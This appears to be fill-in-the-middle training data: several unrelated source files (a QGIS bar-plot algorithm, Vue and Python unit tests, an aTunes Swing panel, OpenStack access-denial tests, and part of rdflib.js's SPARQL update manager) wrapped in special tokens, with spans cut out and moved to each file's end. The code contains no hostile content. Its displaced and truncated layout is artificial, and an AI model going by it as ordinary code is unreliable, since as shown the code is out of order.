# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version", "date": None}<|fim▁end|>
| |
<|file_name|>BarPlot.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""
***************************************************************************
BarPlot.py
---------------------
Date : January 2013
Copyright : (C) 2013 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'January 2013'
__copyright__ = '(C) 2013, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import matplotlib.pyplot as plt
import matplotlib.pylab as lab
import numpy as np
from processing.core.parameters import ParameterTable
from processing.core.parameters import ParameterTableField
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.outputs import OutputHTML
from processing.tools import vector
from processing.tools import dataobjects
<|fim▁hole|> OUTPUT = 'OUTPUT'
NAME_FIELD = 'NAME_FIELD'
VALUE_FIELD = 'VALUE_FIELD'
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('Bar plot')
self.group, self.i18n_group = self.trAlgorithm('Graphics')
self.addParameter(ParameterTable(self.INPUT, self.tr('Input table')))
self.addParameter(ParameterTableField(self.NAME_FIELD,
self.tr('Category name field'),
self.INPUT,
ParameterTableField.DATA_TYPE_NUMBER))
self.addParameter(ParameterTableField(self.VALUE_FIELD,
self.tr('Value field'),
self.INPUT,
ParameterTableField.DATA_TYPE_NUMBER))
self.addOutput(OutputHTML(self.OUTPUT, self.tr('Bar plot')))
def processAlgorithm(self, progress):
layer = dataobjects.getObjectFromUri(
self.getParameterValue(self.INPUT))
namefieldname = self.getParameterValue(self.NAME_FIELD)
valuefieldname = self.getParameterValue(self.VALUE_FIELD)
output = self.getOutputValue(self.OUTPUT)
values = vector.values(layer, namefieldname, valuefieldname)
plt.close()
ind = np.arange(len(values[namefieldname]))
width = 0.8
plt.bar(ind, values[valuefieldname], width, color='r')
plt.xticks(ind, values[namefieldname], rotation=45)
plotFilename = output + '.png'
lab.savefig(plotFilename)
with open(output, 'w') as f:
f.write('<html><img src="' + plotFilename + '"/></html>')<|fim▁end|>
|
class BarPlot(GeoAlgorithm):
INPUT = 'INPUT'
|
<|file_name|>Row.spec.ts<|end_file_name|><|fim▁begin|>import Row from '../Row'
import {
mount,
Wrapper,
MountOptions,
} from '@vue/test-utils'
import Vue from 'vue'
describe('Table Row', () => {
type Instance = InstanceType<typeof Row>
let mountFunction: (options?: MountOptions<Instance>) => Wrapper<Instance>
beforeEach(() => {
mountFunction = (options?: MountOptions<Instance>) => {
return mount(Row, options)
}
})
it('should render without slots', () => {
const wrapper = mountFunction({
context: {
props: {
headers: [
{ text: 'Petrol', value: 'petrol' },
{ text: 'Diesel', value: 'diesel' },
],
item: {
petrol: 0.68,
diesel: 0.65,
},
},
},
})
expect(wrapper.findAll('tr')).toHaveLength(1)
expect(wrapper.findAll('td')).toHaveLength(2)
expect(wrapper.html()).toMatchSnapshot()
})
it('should render non-string values', () => {
const wrapper = mountFunction({
context: {
props: {
headers: [
{ value: 'string' },
{ value: 'number' },
{ value: 'array' },
{ value: 'boolean' },
{ value: 'object' },
{ value: 'undefined' },
{ value: 'null' },
],
item: {
string: 'string',
number: 12.34,
array: [1, 2],
boolean: false,
object: { foo: 'bar' },
null: null,
},
},
},
})
expect(wrapper.html()).toMatchSnapshot()
})
it('should render with cellClass', () => {
const wrapper = mountFunction({
context: {
props: {
headers: [
{ text: 'Petrol', value: 'petrol', cellClass: 'a' },
{ text: 'Diesel', value: 'diesel', cellClass: ['b', 'c'] },
],
item: {
petrol: 0.68,
diesel: 0.65,
},
},
},
})
const tds = wrapper.findAll('td')
expect(tds.at(0).classes()).toContain('a')
expect(tds.at(1).classes()).toContain('b')
expect(tds.at(1).classes()).toContain('c')
expect(wrapper.html()).toMatchSnapshot()
})
it.skip('should render with regular slots', () => {
const wrapper = mountFunction({
context: {
props: {
headers: [
{ text: 'Petrol', value: 'petrol' },
{ text: 'Diesel', value: 'diesel' },
],
},
},
slots: {
'column.petrol': '<p class="test">$0.68</p>',
'column.diesel': '<p class="test">$0.65</p>',
},
})
expect(wrapper.findAll('tr')).toHaveLength(1)
expect(wrapper.findAll('td')).toHaveLength(2)
expect(wrapper.findAll('p.test')).toHaveLength(2)
expect(wrapper.html()).toMatchSnapshot()
})
it.skip('should render with scoped slots', () => {
const vm = new Vue()
const wrapper = mountFunction({
context: {
props: {
headers: [
{ text: 'Petrol', value: 'petrol' },
{ text: 'Diesel', value: 'diesel' },
],
item: {
petrol: 0.68,
diesel: 0.65,
},
},
},
scopedSlots: {
'column.petrol': props => vm.$createElement('p', { staticClass: `test ${props.header.value}` }, [props.value]),
'column.diesel': props => vm.$createElement('p', { staticClass: `test ${props.header.value}` }, [props.value]),
},<|fim▁hole|> expect(wrapper.findAll('p.test')).toHaveLength(2)
expect(wrapper.html()).toMatchSnapshot()
})
})<|fim▁end|>
|
})
expect(wrapper.findAll('tr')).toHaveLength(1)
expect(wrapper.findAll('td')).toHaveLength(2)
|
<|file_name|>AudioObjectBasicInfoContent.java<|end_file_name|><|fim▁begin|>/*
* aTunes
* Copyright (C) Alex Aranda, Sylvain Gaudard and contributors
*
* See http://www.atunes.org/wiki/index.php?title=Contributing for information about contributors
*
* http://www.atunes.org
* http://sourceforge.net/projects/atunes
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
package net.sourceforge.atunes.kernel.modules.context.audioobject;
import java.awt.Component;
import java.awt.GridBagConstraints;
import java.awt.GridBagLayout;
import java.awt.Insets;
import java.util.ArrayList;
import java.util.List;
import javax.swing.AbstractAction;
import javax.swing.ImageIcon;
import javax.swing.JLabel;
import javax.swing.JMenuItem;
import javax.swing.JPanel;
import javax.swing.SwingConstants;
import net.sourceforge.atunes.kernel.modules.context.AbstractContextPanelContent;
import net.sourceforge.atunes.model.ILocalAudioObject;
import net.sourceforge.atunes.model.IStateContext;
import net.sourceforge.atunes.utils.I18nUtils;
/**
* Basic information about an audio object
* @author alex
*
*/
public class AudioObjectBasicInfoContent extends AbstractContextPanelContent<AudioObjectBasicInfoDataSource> {
private static final long serialVersionUID = 996227362636450601L;
/**
* Image for Audio Object
*/
private JLabel audioObjectImage;
/**
* Title of audio object
*/
private JLabel audioObjectTitle;
/**
* Artist of audio object
*/
private JLabel audioObjectArtist;
/**
* Last date played this audio object
*/
private JLabel audioObjectLastPlayDate;
private IStateContext stateContext;
private AbstractAction addLovedSongInLastFMAction;
private AbstractAction addBannedSongInLastFMAction;
<|fim▁hole|> * @param addBannedSongInLastFMAction
*/
public void setAddBannedSongInLastFMAction(AbstractAction addBannedSongInLastFMAction) {
this.addBannedSongInLastFMAction = addBannedSongInLastFMAction;
}
/**
* @param addLovedSongInLastFMAction
*/
public void setAddLovedSongInLastFMAction(AbstractAction addLovedSongInLastFMAction) {
this.addLovedSongInLastFMAction = addLovedSongInLastFMAction;
}
/**
* @param stateContext
*/
public void setStateContext(IStateContext stateContext) {
this.stateContext = stateContext;
}
@Override
public void clearContextPanelContent() {
super.clearContextPanelContent();
audioObjectImage.setIcon(null);
audioObjectImage.setBorder(null);
audioObjectTitle.setText(null);
audioObjectArtist.setText(null);
audioObjectLastPlayDate.setText(null);
addLovedSongInLastFMAction.setEnabled(false);
addBannedSongInLastFMAction.setEnabled(false);
}
@Override
public void updateContentFromDataSource(AudioObjectBasicInfoDataSource source) {
ImageIcon image = source.getImage();
if (image != null) {
audioObjectImage.setIcon(image);
}
audioObjectTitle.setText(source.getTitle());
audioObjectArtist.setText(source.getArtist());
audioObjectLastPlayDate.setText(source.getLastPlayDate());
// TODO: Allow these options for radios where song information is available
addLovedSongInLastFMAction.setEnabled(stateContext.isLastFmEnabled() && source.getAudioObject() instanceof ILocalAudioObject);
addBannedSongInLastFMAction.setEnabled(stateContext.isLastFmEnabled() && source.getAudioObject() instanceof ILocalAudioObject);
}
@Override
public String getContentName() {
return I18nUtils.getString("INFO");
}
@Override
public Component getComponent() {
// Create components
audioObjectImage = new JLabel();
audioObjectTitle = new JLabel();
audioObjectTitle.setHorizontalAlignment(SwingConstants.CENTER);
audioObjectTitle.setFont(getLookAndFeelManager().getCurrentLookAndFeel().getContextInformationBigFont());
audioObjectArtist = new JLabel();
audioObjectArtist.setHorizontalAlignment(SwingConstants.CENTER);
audioObjectLastPlayDate = new JLabel();
audioObjectLastPlayDate.setHorizontalAlignment(SwingConstants.CENTER);
// Add components
JPanel panel = new JPanel(new GridBagLayout());
GridBagConstraints c = new GridBagConstraints();
c.gridx = 0;
c.gridy = 0;
c.insets = new Insets(15, 0, 0, 0);
panel.add(audioObjectImage, c);
c.gridx = 0;
c.gridy = 1;
c.weightx = 1;
c.weighty = 0;
c.fill = GridBagConstraints.HORIZONTAL;
c.insets = new Insets(5, 10, 0, 10);
panel.add(audioObjectTitle, c);
c.gridy = 2;
c.insets = new Insets(5, 10, 10, 10);
panel.add(audioObjectArtist, c);
c.gridy = 3;
panel.add(audioObjectLastPlayDate, c);
return panel;
}
@Override
public List<Component> getOptions() {
List<Component> options = new ArrayList<Component>();
options.add(new JMenuItem(addLovedSongInLastFMAction));
options.add(new JMenuItem(addBannedSongInLastFMAction));
return options;
}
}<|fim▁end|>
|
/**
|
<|file_name|>test_share_servers_negative.py<|end_file_name|><|fim▁begin|># Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest_lib.common.utils import data_utils # noqa
from tempest_lib import exceptions as lib_exc # noqa
from tempest.api.share import base
from tempest import clients_share as clients
from tempest import test
class ShareServersNegativeAdminTest(base.BaseSharesAdminTest):
@classmethod
def resource_setup(cls):
super(ShareServersNegativeAdminTest, cls).resource_setup()
cls.member_shares_client = clients.Manager().shares_client
@test.attr(type=["gate", "smoke", "negative", ])
def test_try_list_share_servers_with_member(self):
self.assertRaises(lib_exc.Forbidden,
self.member_shares_client.list_share_servers)
@test.attr(type=["gate", "smoke", "negative", ])
def test_try_show_share_server_with_member(self):
self.assertRaises(lib_exc.Forbidden,
self.member_shares_client.show_share_server,
'fake_id')
@test.attr(type=["gate", "smoke", "negative", ])
def test_try_show_share_server_details_with_member(self):
self.assertRaises(lib_exc.Forbidden,
self.member_shares_client.show_share_server_details,
'fake_id')
@test.attr(type=["gate", "smoke", "negative", ])
def test_show_share_server_with_inexistent_id(self):
self.assertRaises(lib_exc.NotFound,
self.shares_client.show_share_server,
'fake_id')
@test.attr(type=["gate", "smoke", "negative", ])
def test_show_share_server_details_with_inexistent_id(self):
self.assertRaises(lib_exc.NotFound,
self.shares_client.show_share_server_details,
'fake_id')
@test.attr(type=["gate", "smoke", "negative", ])
def test_list_share_servers_with_wrong_filter_key(self):<|fim▁hole|> @test.attr(type=["gate", "smoke", "negative", ])
def test_list_share_servers_with_wrong_filter_value(self):
search_opts = {'host': 123}
servers = self.shares_client.list_share_servers(search_opts)
self.assertEqual(len(servers), 0)
@test.attr(type=["gate", "smoke", "negative", ])
def test_list_share_servers_with_fake_status(self):
search_opts = {"status": data_utils.rand_name("fake_status")}
servers = self.shares_client.list_share_servers(search_opts)
self.assertEqual(len(servers), 0)
@test.attr(type=["gate", "smoke", "negative", ])
def test_list_share_servers_with_fake_host(self):
search_opts = {"host": data_utils.rand_name("fake_host")}
servers = self.shares_client.list_share_servers(search_opts)
self.assertEqual(len(servers), 0)
@test.attr(type=["gate", "smoke", "negative", ])
def test_list_share_servers_with_fake_project(self):
search_opts = {"project_id": data_utils.rand_name("fake_project_id")}
servers = self.shares_client.list_share_servers(search_opts)
self.assertEqual(len(servers), 0)
@test.attr(type=["gate", "smoke", "negative", ])
def test_list_share_servers_with_fake_share_network(self):
search_opts = {
"share_network": data_utils.rand_name("fake_share_network"),
}
servers = self.shares_client.list_share_servers(search_opts)
self.assertEqual(len(servers), 0)
@test.attr(type=["gate", "smoke", "negative", ])
def test_delete_share_server_with_nonexistent_id(self):
self.assertRaises(lib_exc.NotFound,
self.shares_client.delete_share_server,
"fake_nonexistent_share_server_id")
@test.attr(type=["gate", "smoke", "negative", ])
def test_delete_share_server_with_member(self):
self.assertRaises(lib_exc.Forbidden,
self.member_shares_client.delete_share_server,
"fake_nonexistent_share_server_id")<|fim▁end|>
|
search_opts = {'fake_filter_key': 'ACTIVE'}
servers = self.shares_client.list_share_servers(search_opts)
self.assertEqual(len(servers), 0)
|
<|file_name|>test_uptime.py<|end_file_name|><|fim▁begin|>import unittest
try:
from unittest import mock
except ImportError:
import mock
from pi3bar.plugins.uptime import get_uptime_seconds, uptime_format, Uptime
class GetUptimeSecondsTestCase(unittest.TestCase):
def test(self):<|fim▁hole|> m.return_value.readline.return_value = '5' # py33
with mock.patch('pi3bar.plugins.uptime.open', m, create=True):
seconds = get_uptime_seconds()
self.assertEqual(5, seconds)
class UptimeFormatTestCase(unittest.TestCase):
def test_seconds(self):
s = uptime_format(5)
self.assertEqual('0:00:00:05', s)
def test_minutes(self):
s = uptime_format(3540)
self.assertEqual('0:00:59:00', s)
def test_hours(self):
s = uptime_format(49020)
self.assertEqual('0:13:37:00', s)
def test_days(self):
s = uptime_format(135420)
self.assertEqual('1:13:37:00', s)
def test_format_days_applied_to_hours(self):
s = uptime_format(135420, '%H:%M:%S')
self.assertEqual('37:37:00', s)
def test_format_hours_applied_to_minutes(self):
s = uptime_format(49020, '%M:%S')
self.assertEqual('817:00', s)
class UptimeTestCase(unittest.TestCase):
def test(self):
plugin = Uptime()
self.assertEqual('%d days %H:%M:%S up', plugin.full_format)
self.assertEqual('%dd %H:%M up', plugin.short_format)
@mock.patch('pi3bar.plugins.uptime.get_uptime_seconds')
def test_cycle(self, mock_get_uptime_seconds):
plugin = Uptime()
mock_get_uptime_seconds.return_value = 49020
plugin.cycle()
self.assertEqual('0 days 13:37:00 up', plugin.full_text)
self.assertEqual('0d 13:37 up', plugin.short_text)<|fim▁end|>
|
m = mock.mock_open(read_data='5')
|
<|file_name|>update-manager.js<|end_file_name|><|fim▁begin|>// Joe Presbrey <[email protected]>
// 2007-07-15
// 2010-08-08 TimBL folded in Kenny's WEBDAV
// 2010-12-07 TimBL added local file write code
const docpart = require('./uri').docpart
const Fetcher = require('./fetcher')
const graph = require('./data-factory').graph
import IndexedFormula from './indexed-formula'
const namedNode = require('./data-factory').namedNode
const Namespace = require('./namespace')
const Serializer = require('./serializer')
const uriJoin = require('./uri').join
const Util = require('./util')
var UpdateManager = (function () {
var sparql = function (store) {
this.store = store
if (store.updater) {
throw new Error("You can't have two UpdateManagers for the same store")
}
if (!store.fetcher) { // The store must also/already have a fetcher
new Fetcher(store)
}
store.updater = this
this.ifps = {}
this.fps = {}
this.ns = {}
this.ns.link = Namespace('http://www.w3.org/2007/ont/link#')
this.ns.http = Namespace('http://www.w3.org/2007/ont/http#')
this.ns.httph = Namespace('http://www.w3.org/2007/ont/httph#')
this.ns.ldp = Namespace('http://www.w3.org/ns/ldp#')
this.ns.rdf = Namespace('http://www.w3.org/1999/02/22-rdf-syntax-ns#')
this.ns.rdfs = Namespace('http://www.w3.org/2000/01/rdf-schema#')
this.ns.rdf = Namespace('http://www.w3.org/1999/02/22-rdf-syntax-ns#')
this.ns.owl = Namespace('http://www.w3.org/2002/07/owl#')
    this.patchControl = [] // index of objects for coordinating incoming and outgoing patches
}
sparql.prototype.patchControlFor = function (doc) {
if (!this.patchControl[doc.uri]) {
this.patchControl[doc.uri] = []
}
return this.patchControl[doc.uri]
}
  // Returns the method string SPARQL or DAV or LOCALFILE; false if known not to be editable; undefined if not known.
//
  // Files have to have a specific annotation that they are machine written, for safety.
// We don't actually check for write access on files.
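  // Hypothetical usage sketch:
  //   if (kb.updater.editable(doc.uri) === 'SPARQL') { /* safe to send a SPARQL PATCH */ }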
//
sparql.prototype.editable = function (uri, kb) {
if (!uri) {
      return false // e.g. subject is bnode, no known doc to write to
}
if (!kb) {
kb = this.store
}
if (uri.slice(0, 8) === 'file:///') {
if (kb.holds(
kb.sym(uri),
namedNode('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
namedNode('http://www.w3.org/2007/ont/link#MachineEditableDocument')
)) {
return 'LOCALFILE'
}
var sts = kb.statementsMatching(kb.sym(uri), undefined, undefined)
console.log('sparql.editable: Not MachineEditableDocument file ' +
uri + '\n')
console.log(sts.map(function (x) {
return x.toNT()
}).join('\n'))
return false
      // @@ Would be nifty of course to see whether we actually have write access first.
}
var request
var definitive = false
var requests = kb.each(undefined, this.ns.link('requestedURI'),
docpart(uri))
// Hack for the moment @@@@ 2016-02-12
if (kb.holds(namedNode(uri), this.ns.rdf('type'), this.ns.ldp('Resource'))) {
return 'SPARQL'
}
var i
var method
for (var r = 0; r < requests.length; r++) {
request = requests[r]
if (request !== undefined) {
var response = kb.any(request, this.ns.link('response'))
        if (response !== undefined) {
var acceptPatch = kb.each(response, this.ns.httph('accept-patch'))
if (acceptPatch.length) {
for (i = 0; i < acceptPatch.length; i++) {
method = acceptPatch[i].value.trim()
if (method.indexOf('application/sparql-update') >= 0) return 'SPARQL'
}
}
var author_via = kb.each(response, this.ns.httph('ms-author-via'))
if (author_via.length) {
for (i = 0; i < author_via.length; i++) {
method = author_via[i].value.trim()
if (method.indexOf('SPARQL') >= 0) {
return 'SPARQL'
}
if (method.indexOf('DAV') >= 0) {
return 'DAV'
}
}
}
var status = kb.each(response, this.ns.http('status'))
if (status.length) {
for (i = 0; i < status.length; i++) {
if (status[i] === 200 || status[i] === 404) {
definitive = true
// return false // A definitive answer
}
}
}
} else {
console.log('sparql.editable: No response for ' + uri + '\n')
}
}
}
if (requests.length === 0) {
console.log('sparql.editable: No request for ' + uri + '\n')
} else {
if (definitive) {
return false // We have got a request and it did NOT say editable => not editable
}<|fim▁hole|>
// ///////// The identification of bnodes
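  // anonymize() swaps a mentioned bnode for a SPARQL variable (?name) so the
  // server can bind it via the WHERE clause; other terms pass through as N-Triples.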
sparql.prototype.anonymize = function (obj) {
return (obj.toNT().substr(0, 2) === '_:' && this._mentioned(obj))
? '?' + obj.toNT().substr(2)
: obj.toNT()
}
sparql.prototype.anonymizeNT = function (stmt) {
return this.anonymize(stmt.subject) + ' ' +
this.anonymize(stmt.predicate) + ' ' +
this.anonymize(stmt.object) + ' .'
}
  // A list of all bnodes occurring in a statement
sparql.prototype._statement_bnodes = function (st) {
return [st.subject, st.predicate, st.object].filter(function (x) {
return x.isBlank
})
}
  // A list of all bnodes occurring in a list of statements
sparql.prototype._statement_array_bnodes = function (sts) {
var bnodes = []
for (var i = 0; i < sts.length; i++) {
bnodes = bnodes.concat(this._statement_bnodes(sts[i]))
}
bnodes.sort() // in place sort - result may have duplicates
var bnodes2 = []
for (var j = 0; j < bnodes.length; j++) {
if (j === 0 || !bnodes[j].sameTerm(bnodes[j - 1])) {
bnodes2.push(bnodes[j])
}
}
return bnodes2
}
sparql.prototype._cache_ifps = function () {
// Make a cached list of [Inverse-]Functional properties
// Call this once before calling context_statements
this.ifps = {}
var a = this.store.each(undefined, this.ns.rdf('type'), this.ns.owl('InverseFunctionalProperty'))
for (var i = 0; i < a.length; i++) {
this.ifps[a[i].uri] = true
}
this.fps = {}
a = this.store.each(undefined, this.ns.rdf('type'), this.ns.owl('FunctionalProperty'))
for (i = 0; i < a.length; i++) {
this.fps[a[i].uri] = true
}
}
// Returns a context to bind a given node, up to a given depth
sparql.prototype._bnode_context2 = function (x, source, depth) {
// Return a list of statements which indirectly identify a node
    // Depth > 1 to try further indirection.
// Return array of statements (possibly empty), or null if failure
var sts = this.store.statementsMatching(undefined, undefined, x, source) // incoming links
var y
var res
for (var i = 0; i < sts.length; i++) {
if (this.fps[sts[i].predicate.uri]) {
y = sts[i].subject
if (!y.isBlank) {
return [ sts[i] ]
}
if (depth) {
res = this._bnode_context2(y, source, depth - 1)
if (res) {
return res.concat([ sts[i] ])
}
}
}
}
// outgoing links
sts = this.store.statementsMatching(x, undefined, undefined, source)
for (i = 0; i < sts.length; i++) {
if (this.ifps[sts[i].predicate.uri]) {
y = sts[i].object
if (!y.isBlank) {
return [ sts[i] ]
}
if (depth) {
res = this._bnode_context2(y, source, depth - 1)
if (res) {
return res.concat([ sts[i] ])
}
}
}
}
return null // Failure
}
// Returns the smallest context to bind a given single bnode
sparql.prototype._bnode_context_1 = function (x, source) {
// Return a list of statements which indirectly identify a node
// Breadth-first
var self = this
for (var depth = 0; depth < 3; depth++) { // Try simple first
var con = this._bnode_context2(x, source, depth)
if (con !== null) return con
}
// If we can't guarantee unique with logic just send all info about node
return this.store.connectedStatements(x, source) // was:
// throw new Error('Unable to uniquely identify bnode: ' + x.toNT())
}
sparql.prototype._mentioned = function (x) {
return (this.store.statementsMatching(x).length !== 0) || // Don't pin fresh bnodes
(this.store.statementsMatching(undefined, x).length !== 0) ||
(this.store.statementsMatching(undefined, undefined, x).length !== 0)
}
sparql.prototype._bnode_context = function (bnodes, doc) {
var context = []
if (bnodes.length) {
this._cache_ifps()
for (var i = 0; i < bnodes.length; i++) { // Does this occur in old graph?
var bnode = bnodes[i]
if (!this._mentioned(bnode)) continue
context = context.concat(this._bnode_context_1(bnode, doc))
}
}
return context
}
/* Weird code does not make sense -- some code corruption along the line -- st undefined -- weird
sparql.prototype._bnode_context = function(bnodes) {
var context = []
if (bnodes.length) {
if (this.store.statementsMatching(st.subject.isBlank?undefined:st.subject,
st.predicate.isBlank?undefined:st.predicate,
st.object.isBlank?undefined:st.object,
st.why).length <= 1) {
context = context.concat(st)
} else {
this._cache_ifps()
for (x in bnodes) {
context = context.concat(this._bnode_context_1(bnodes[x], st.why))
}
}
}
return context
}
*/
// Returns the best context for a single statement
sparql.prototype._statement_context = function (st) {
var bnodes = this._statement_bnodes(st)
return this._bnode_context(bnodes, st.why)
}
sparql.prototype._context_where = function (context) {
var sparql = this
return (!context || context.length === 0)
? ''
: 'WHERE { ' +
context.map(function (x) {
return sparql.anonymizeNT(x)
}).join('\n') + ' }\n'
}
sparql.prototype._fire = function (uri, query, callback) {
if (!uri) {
throw new Error('No URI given for remote editing operation: ' + query)
}
console.log('sparql: sending update to <' + uri + '>')
var xhr = Util.XMLHTTPFactory()
xhr.options = {}
xhr.onreadystatechange = function () {
// dump("SPARQL update ready state for <"+uri+"> readyState="+xhr.readyState+"\n"+query+"\n")
if (xhr.readyState === 4) {
var success = (!xhr.status || (xhr.status >= 200 && xhr.status < 300))
if (!success) {
console.log('sparql: update failed for <' + uri + '> status=' +
xhr.status + ', ' + xhr.statusText + ', body length=' + xhr.responseText.length + '\n for query: ' + query)
} else {
console.log('sparql: update Ok for <' + uri + '>')
}
callback(uri, success, xhr.responseText, xhr)
}
}
xhr.open('PATCH', uri, true) // async=true
xhr.setRequestHeader('Content-type', 'application/sparql-update')
xhr.send(query)
}
// This does NOT update the statement.
  // It returns an object which includes
  // a function that can be used to change the object of the statement.
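  // Hypothetical usage sketch:
  //   var upd = kb.updater.update_statement(st)
  //   upd.set_object(newObject, function (uri, ok, body) { /* check ok */ })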
//
sparql.prototype.update_statement = function (statement) {
if (statement && !statement.why) {
return
}
var sparql = this
var context = this._statement_context(statement)
return {
statement: statement ? [statement.subject, statement.predicate, statement.object, statement.why] : undefined,
statementNT: statement ? this.anonymizeNT(statement) : undefined,
where: sparql._context_where(context),
set_object: function (obj, callback) {
var query = this.where
query += 'DELETE DATA { ' + this.statementNT + ' } ;\n'
query += 'INSERT DATA { ' +
this.anonymize(this.statement[0]) + ' ' +
this.anonymize(this.statement[1]) + ' ' +
this.anonymize(obj) + ' ' + ' . }\n'
sparql._fire(this.statement[3].uri, query, callback)
}
}
}
sparql.prototype.insert_statement = function (st, callback) {
var st0 = st instanceof Array ? st[0] : st
var query = this._context_where(this._statement_context(st0))
if (st instanceof Array) {
var stText = ''
for (var i = 0; i < st.length; i++) stText += st[i] + '\n'
query += 'INSERT DATA { ' + stText + ' }\n'
} else {
query += 'INSERT DATA { ' +
this.anonymize(st.subject) + ' ' +
this.anonymize(st.predicate) + ' ' +
this.anonymize(st.object) + ' ' + ' . }\n'
}
this._fire(st0.why.uri, query, callback)
}
sparql.prototype.delete_statement = function (st, callback) {
var st0 = st instanceof Array ? st[0] : st
var query = this._context_where(this._statement_context(st0))
if (st instanceof Array) {
var stText = ''
for (var i = 0; i < st.length; i++) stText += st[i] + '\n'
query += 'DELETE DATA { ' + stText + ' }\n'
} else {
query += 'DELETE DATA { ' +
this.anonymize(st.subject) + ' ' +
this.anonymize(st.predicate) + ' ' +
this.anonymize(st.object) + ' ' + ' . }\n'
}
this._fire(st0.why.uri, query, callback)
}
// Request a now or future action to refresh changes coming downstream
//
// This is designed to allow the system to re-request the server version,
// when a websocket has pinged to say there are changes.
// If the websocket, by contrast, has sent a patch, then this may not be necessary.
// This may be called out of context so *this* cannot be used.
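// Usage sketch (the handler below is hypothetical):
//   updater.requestDownstreamAction(doc, function (doc) {
//     // re-fetch doc and refresh the UI; this runs immediately, or is
//     // deferred until pending upstream patches have completed
//   })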
sparql.prototype.requestDownstreamAction = function (doc, action) {
var control = this.patchControlFor(doc)
if (!control.pendingUpstream) {
action(doc)
} else {
if (control.downstreamAction) {
if (control.downstreamAction === action) {
return
} else {
        throw new Error("Can't wait for > 1 different downstream actions")
}
} else {
control.downstreamAction = action
}
}
}
// We want to start counting websocket notifications
// to distinguish other people's changes from our own.
sparql.prototype.clearUpstreamCount = function (doc) {
var control = this.patchControlFor(doc)
control.upstreamCount = 0
}
sparql.prototype.getUpdatesVia = function (doc) {
var linkHeaders = this.store.fetcher.getHeader(doc, 'updates-via')
if (!linkHeaders || !linkHeaders.length) return null
return linkHeaders[0].trim()
}
sparql.prototype.addDownstreamChangeListener = function (doc, listener) {
var control = this.patchControlFor(doc)
if (!control.downstreamChangeListeners) control.downstreamChangeListeners = []
control.downstreamChangeListeners.push(listener)
var self = this
  this.setRefreshHandler(doc, function (doc) { // a function, not a method
self.reloadAndSync(doc)
})
}
sparql.prototype.reloadAndSync = function (doc) {
var control = this.patchControlFor(doc)
var updater = this
if (control.reloading) {
console.log(' Already reloading - stop')
return // once only needed
}
control.reloading = true
var retryTimeout = 1000 // ms
var tryReload = function () {
console.log('try reload - timeout = ' + retryTimeout)
updater.reload(updater.store, doc, function (ok, message, xhr) {
control.reloading = false
if (ok) {
if (control.downstreamChangeListeners) {
for (var i = 0; i < control.downstreamChangeListeners.length; i++) {
console.log(' Calling downstream listener ' + i)
control.downstreamChangeListeners[i]()
}
}
} else {
if (xhr.status === 0) {
console.log('Network error refreshing the data. Retrying in ' +
retryTimeout / 1000)
control.reloading = true
retryTimeout = retryTimeout * 2
setTimeout(tryReload, retryTimeout)
} else {
          console.log('Error ' + xhr.status + ' refreshing the data: ' +
            message + '. Stopped ' + doc)
}
}
})
}
tryReload()
}
// Set up websocket to listen on
//
// There is coordination between upstream changes and downstream ones
// so that a reload is not done in the middle of an upstream patch.
// If you use this API then you get called when a change happens, and you
// have to reload the file yourself, and then refresh the UI.
// Alternative is addDownstreamChangeListener(), where you do not
// have to do the reload yourself. Do not mix them.
//
// kb contains the HTTP metadata from previous operations
//
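// Minimal usage sketch (refreshMyUI is a hypothetical callback you own):
//   updater.setRefreshHandler(doc, function (doc) {
//     updater.reload(updater.store, doc, function (ok) {
//       if (ok) refreshMyUI(doc)
//     })
//   })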
sparql.prototype.setRefreshHandler = function (doc, handler) {
var wssURI = this.getUpdatesVia(doc) // relative
// var kb = this.store
var theHandler = handler
var self = this
var updater = this
var retryTimeout = 1500 // *2 will be 3 Seconds, 6, 12, etc
var retries = 0
if (!wssURI) {
    console.log('Server does not support live updates through Updates-Via :-(')
return false
}
wssURI = uriJoin(wssURI, doc.uri)
wssURI = wssURI.replace(/^http:/, 'ws:').replace(/^https:/, 'wss:')
console.log('Web socket URI ' + wssURI)
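  // Wire protocol (per the solid-spec live-updates draft): after the socket
  // opens we send 'sub <docURI>'; the server pushes 'pub <docURI>' whenever
  // that resource changes (see socket.onopen and socket.onmessage below).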
var openWebsocket = function () {
// From https://github.com/solid/solid-spec#live-updates
var socket
if (typeof WebSocket !== 'undefined') {
socket = new WebSocket(wssURI)
} else if (typeof Services !== 'undefined') { // Firefox add on http://stackoverflow.com/questions/24244886/is-websocket-supported-in-firefox-for-android-addons
socket = (Services.wm.getMostRecentWindow('navigator:browser').WebSocket)(wssURI)
} else if (typeof window !== 'undefined' && window.WebSocket) {
      socket = new window.WebSocket(wssURI)
} else {
console.log('Live update disabled, as WebSocket not supported by platform :-(')
return
}
socket.onopen = function () {
